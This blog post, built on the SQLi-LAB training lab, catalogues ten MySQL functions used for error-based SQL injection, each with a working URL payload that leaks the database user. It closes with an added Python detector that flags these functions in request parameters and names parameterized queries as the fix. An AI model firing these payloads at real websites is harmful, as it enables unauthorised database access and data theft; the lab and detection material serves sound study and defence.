SQL Injection: A Summary of Error-Based Functions

2020-03-29  gg大宇

The lab used is SQLi-LAB Lesson 1:



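Most of the articles I found online cover only floor(), extractvalue(), updatexml() and exp() as error-based functions, but MySQL has many other functions that can be used to trigger errors.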

1. floor()

payload:id=-1'+and+(select 1 from (select count(*),concat(user(),floor(rand()*2))x from information_schema.tables group by x limit 0,1)a)%23

2. extractvalue()

Using sqli-lab Lesson 2
payload:id=1+and+(extractvalue(1,concat(0x5c,(select user()))))%23


3. updatexml()

payload:id=1+and+(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))%23


4. GeometryCollection()

payload:id=1+and+GeometryCollection((select * from(select *from(select user())a)b))%23


5. polygon()

payload:id=1+and+polygon((select * from(select * from(select user())a)b))%23


6. multipoint()

payload:id=1+and+multipoint((select * from(select * from (select user())a)b))%23


7. multilinestring()

payload:id=1+and+multilinestring((select * from(select * from (select user())a)b))%23


8. multipolygon()

payload:id=1+and+multipolygon((select * from (select * from (select user())a)b))%23


9. linestring()

payload:id=1+and+linestring((select * from (select * from (select user())a)b))%23


10. exp()

payload:id=1+and+exp(~(select * from (select user())a))%23
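
For the detection side, the following added example (not part of the original post) flags request parameters that call any of the ten functions listed above in the way these payloads do. The names `normalize` and `suspicious_functions` and the sample requests are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Function names come from the list above; floor() is handled separately
# because its error needs floor(rand()) rather than a subquery argument.
SUBQUERY_FUNCS = ("extractvalue", "updatexml", "geometrycollection", "polygon",
                  "multipoint", "multilinestring", "multipolygon", "linestring",
                  "exp")
PATTERNS = [
    re.compile(r"\b(floor)\s*\(\s*rand\s*\("),
    # listed function called with an argument that contains a SELECT
    re.compile(r"\b(" + "|".join(SUBQUERY_FUNCS) + r")\s*\((?=.*\bselect\b)",
               re.S),
]
COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)


def normalize(value):
    """Lowercase, drop /* */ comments and collapse whitespace."""
    return re.sub(r"\s+", " ", COMMENT_RE.sub(" ", value)).lower()


def suspicious_functions(url):
    """Return the sorted error-based function names found in a URL's query."""
    hits = set()
    # parse_qsl percent-decodes each value and turns '+' into a space
    for _key, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        text = normalize(value)
        for pattern in PATTERNS:
            hits.update(m.group(1) for m in pattern.finditer(text))
    return sorted(hits)


# Constructed sample requests (not taken from any real log)
SAMPLE_REQUESTS = [
    "/Less-2/?id=1+and+UpdateXML/**/(1,concat(0x7e,(SeLeCt+1)),1)%23",
    "/Less-2/?id=1+and+multipolygon((select+*+from(select+1)a))%23",
    "/Less-1/?id=-1'+and+(select+1+from+(select+count(*),"
    "concat(1,floor(rand()*2))x+from+t+group+by+x)a)%23",
    "/calc?expr=exp(2)&note=floor+plan",
]

if __name__ == "__main__":
    for request in SAMPLE_REQUESTS:
        print(suspicious_functions(request), request)
```

A rule like this is a log-review or WAF signal only; the fix for the injectable `id` parameter is a parameterized query.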

